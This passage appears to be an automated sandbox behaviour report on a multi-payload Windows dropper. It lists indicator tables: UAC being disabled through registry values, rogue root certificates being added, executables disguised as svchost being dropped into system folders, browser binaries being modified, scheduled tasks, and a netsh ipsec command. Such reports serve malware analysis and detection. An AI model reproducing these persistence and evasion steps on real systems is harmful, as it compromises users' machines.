| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
Indicator Removal: File Deletion
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
Checks system information in the registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\TXPlatforn.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\TXPlatforn.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\240629765.txt | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\ini.ini | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| File created | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | C:\Windows\SysWOW64\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\VideoLAN\VLC\vlc.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File created | C:\Program Files (x86)\Internet Explorer\fr-FR\SearchApp.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files (x86)\SCSI Monitor\scsimon.exe | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\SCSI Monitor\scsimon.exe | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File created | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Internet Explorer\fr-FR\SearchApp.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Program Files (x86)\Internet Explorer\fr-FR\38384e6a620884a6b69bcc56f80d556f9200171c | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Help\Winlogon.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Help\active_desktop_render.dll | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Cursors\WUDFhosts.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Windows\Resources\Ease of Access Themes\3a6fe29a7ceee6587669798812d4baccab0fb913 | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Windows\Cursors\KillProcc.sys | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File opened for modification | C:\Windows\Cursors\TrustedInsteller.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Help\active_desktop_render_New.dll | C:\Windows\SysWOW64\svchost.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Help\Winlogon.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\gay.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\test.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Help\Winlogon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\healastounding.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\HD____11.19.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\4.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\svchost.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (binary blob data omitted) | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5 | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob = (binary blob data omitted) | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob = (binary blob data omitted) | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (binary blob data omitted) | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 694643.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\Resources\Ease of Access Themes\schtasks.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe
"C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"
C:\Users\Admin\AppData\Roaming\healastounding.exe
"C:\Users\Admin\AppData\Roaming\healastounding.exe"
C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
"C:\Users\Admin\AppData\Roaming\Pluto Panel.exe"
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
C:\Users\Admin\AppData\Roaming\22.exe
"C:\Users\Admin\AppData\Roaming\22.exe"
C:\Users\Admin\AppData\Roaming\___11.19.exe
"C:\Users\Admin\AppData\Roaming\___11.19.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Block
C:\Users\Admin\AppData\Local\Temp\svchost.exe
